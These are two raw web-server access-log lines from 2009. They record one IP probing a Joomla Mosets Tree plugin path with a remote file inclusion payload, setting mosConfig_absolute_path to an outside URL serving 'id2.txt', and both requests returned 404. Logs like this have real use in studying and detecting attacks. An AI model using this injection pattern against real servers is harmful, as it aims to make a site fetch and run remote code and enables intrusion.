74.223.143.131 - - [17/Jul/2009:03:29:57 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jul/2009:03:29:57 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
